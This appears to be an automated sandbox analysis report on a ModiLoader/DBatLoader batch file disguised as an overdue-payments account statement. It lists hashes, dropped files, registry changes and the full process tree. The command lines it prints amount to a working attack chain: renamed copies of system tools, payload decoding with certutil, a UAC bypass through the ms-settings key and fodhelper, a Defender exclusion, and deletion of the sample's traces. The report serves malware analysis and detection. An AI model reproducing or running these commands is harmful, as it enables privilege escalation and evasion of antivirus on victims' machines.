Analysis
  max time kernel: 141s
  max time network: 120s
  platform: windows7_x64
  resource: win7-20231129-en
  resource tags: arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
  submitted: 26-03-2024 02:42

Static task: static1

Behavioral task: behavioral1
  Sample: Statement Of Account - Overdue Payments #94839540823489.bat
  Resource: win7-20231129-en

Behavioral task: behavioral2
  Sample: Statement Of Account - Overdue Payments #94839540823489.bat
  Resource: win10v2004-20240226-en

General
  Target: Statement Of Account - Overdue Payments #94839540823489.bat
  Size: 2.9MB
  MD5: 0acc894a421b72f77d8f825865710ec4
  SHA1: e51bfe768ece4a254a5f85c977fa65dfa963c3b8
  SHA256: e03f365bff6dc4429c91f0ebd0bfdbf6eadaeb3c3cf4b3b30ecb8e9797f46c5e
  SHA512: 4faafabc07bf132657e54b4107b97dc339143439a26802589a5aae94325e38e2a37766a647baa42b1a6ee069aa2bae3f6ffc12eb6b5c7fac64a7ee06cd169f02
  SSDEEP: 24576:yn8Rm6aVrLy7bOkM75parJLzx60bCNB0PEsNl36h3vKYtKYKCgsX9t6HtzA6GC89:KomdNy7bOT5u9zgApY
Malware Config
Signatures

ModiLoader, DBatLoader
  ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

ModiLoader Second Stage 1 IoCs
  resource:  behavioral1/memory/2928-57-0x00000000030E0000-0x00000000040E0000-memory.dmp
  yara_rule: modiloader_stage2

Executes dropped EXE 16 IoCs
  PID   Process
  1844  alpha.exe
  1152  alpha.exe
  1928  alpha.exe
  2620  xkn.exe
  2816  alpha.exe
  2604  alpha.exe
  2496  kn.exe
  2524  alpha.exe
  2568  kn.exe
  2928  Lewxa.com
  3056  alpha.exe
  1704  alpha.exe
  2160  alpha.exe
  1632  alpha.exe
  2720  alpha.exe
  2792  alpha.exe

Loads dropped DLL 10 IoCs
  PID   Process
  2248  cmd.exe
  2248  cmd.exe
  2248  cmd.exe
  1928  alpha.exe
  2620  xkn.exe
  2620  xkn.exe
  2620  xkn.exe
  2604  alpha.exe
  1560  WerFault.exe
  1560  WerFault.exe

Enumerates physical storage devices 1 TTPs
  Attempts to interact with connected storage/optical drive(s).

Program crash 1 IoCs
  PID   pid_target  Process       procid_target
  1560  2928        WerFault.exe  43

Kills process with taskkill 2 IoCs
  PID   Process
  2564  taskkill.exe
  2788  taskkill.exe

Modifies registry class 5 IoCs
  Key created (reg.exe):     \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open\command
  Key created (reg.exe):     \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings
  Key created (reg.exe):     \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell
  Key created (reg.exe):     \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open
  Set value (str) (reg.exe): \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users "

Modifies registry key 1 TTPs 1 IoCs
  PID   Process
  1792  reg.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  PID   Process
  2928  Lewxa.com

Suspicious behavior: EnumeratesProcesses 1 IoCs
  PID   Process
  2620  xkn.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs
  description              PID   Process
  Token: SeDebugPrivilege  2620  xkn.exe
  Token: SeDebugPrivilege  2564  taskkill.exe
  Token: SeDebugPrivilege  2788  taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs
  (rows the report repeats verbatim are listed once; the last column gives how many times each occurs)
  description                       PID   Process    procid_target  occurrences
  PID 2248 wrote to memory of 1680  2248  cmd.exe    29             3
  PID 1680 wrote to memory of 2460  1680  cmd.exe    30             3
  PID 2248 wrote to memory of 1844  2248  cmd.exe    31             3
  PID 1844 wrote to memory of 1836  1844  alpha.exe  32             3
  PID 2248 wrote to memory of 1152  2248  cmd.exe    33             3
  PID 1152 wrote to memory of 2068  1152  alpha.exe  34             3
  PID 2248 wrote to memory of 1928  2248  cmd.exe    35             3
  PID 1928 wrote to memory of 2620  1928  alpha.exe  36             3
  PID 2620 wrote to memory of 2816  2620  xkn.exe    37             3
  PID 2816 wrote to memory of 1792  2816  alpha.exe  38             3
  PID 2248 wrote to memory of 2604  2248  cmd.exe    39             3
  PID 2604 wrote to memory of 2496  2604  alpha.exe  40             3
  PID 2248 wrote to memory of 2524  2248  cmd.exe    41             3
  PID 2524 wrote to memory of 2568  2524  alpha.exe  42             3
  PID 2248 wrote to memory of 2928  2248  cmd.exe    43             4
  PID 2248 wrote to memory of 3056  2248  cmd.exe    44             3
  PID 2248 wrote to memory of 1704  2248  cmd.exe    45             3
  PID 2248 wrote to memory of 2160  2248  cmd.exe    46             3
  PID 2248 wrote to memory of 1632  2248  cmd.exe    47             3
  PID 2248 wrote to memory of 2720  2248  cmd.exe    48             3
  PID 2720 wrote to memory of 2564  2720  alpha.exe  49             3
Processes
C:\Windows\system32\cmd.exe  [PID 2248, depth 1]
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\Statement Of Account - Overdue Payments #94839540823489.bat"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory

    C:\Windows\system32\cmd.exe  [PID 1680, depth 2]
      Command line: cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\extrac32.exe  [PID 2460, depth 3]
          Command line: extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe

    C:\Users\Public\alpha.exe  [PID 1844, depth 2]
      Command line: C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\extrac32.exe  [PID 1836, depth 3]
          Command line: extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe

    C:\Users\Public\alpha.exe  [PID 1152, depth 2]
      Command line: C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\extrac32.exe  [PID 2068, depth 3]
          Command line: extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

    C:\Users\Public\alpha.exe  [PID 1928, depth 2]
      Command line: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory

        C:\Users\Public\xkn.exe  [PID 2620, depth 3]
          Command line: C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
          - Executes dropped EXE
          - Loads dropped DLL
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory

            C:\Users\Public\alpha.exe  [PID 2816, depth 4]
              Command line: "C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
              - Executes dropped EXE
              - Suspicious use of WriteProcessMemory

                C:\Windows\system32\reg.exe  [PID 1792, depth 5]
                  Command line: reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
                  - Modifies registry class
                  - Modifies registry key

    C:\Users\Public\alpha.exe  [PID 2604, depth 2]
      Command line: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Statement Of Account - Overdue Payments #94839540823489.bat" "C:\\Users\\Public\\Lewxa.txt" 9
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory

        C:\Users\Public\kn.exe  [PID 2496, depth 3]
          Command line: C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Statement Of Account - Overdue Payments #94839540823489.bat" "C:\\Users\\Public\\Lewxa.txt" 9
          - Executes dropped EXE

    C:\Users\Public\alpha.exe  [PID 2524, depth 2]
      Command line: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

        C:\Users\Public\kn.exe  [PID 2568, depth 3]
          Command line: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
          - Executes dropped EXE

    C:\Users\Public\Libraries\Lewxa.com  [PID 2928, depth 2]
      Command line: C:\\Users\\Public\\Libraries\\Lewxa.com
      - Executes dropped EXE
      - Suspicious behavior: CmdExeWriteProcessMemorySpam

        C:\Windows\SysWOW64\WerFault.exe  [PID 1560, depth 3]
          Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 836
          - Loads dropped DLL
          - Program crash

    C:\Users\Public\alpha.exe  [PID 3056, depth 2]
      Command line: C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S
      - Executes dropped EXE

    C:\Users\Public\alpha.exe  [PID 1704, depth 2]
      Command line: C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S
      - Executes dropped EXE

    C:\Users\Public\alpha.exe  [PID 2160, depth 2]
      Command line: C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
      - Executes dropped EXE

    C:\Users\Public\alpha.exe  [PID 1632, depth 2]
      Command line: C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
      - Executes dropped EXE

    C:\Users\Public\alpha.exe  [PID 2720, depth 2]
      Command line: C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\taskkill.exe  [PID 2564, depth 3]
          Command line: taskkill /F /IM SystemSettings.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

    C:\Users\Public\alpha.exe  [PID 2792, depth 2]
      Command line: C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
      - Executes dropped EXE

        C:\Windows\system32\taskkill.exe  [PID 2788, depth 3]
          Command line: taskkill /F /IM SystemSettingsAdminFlows.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads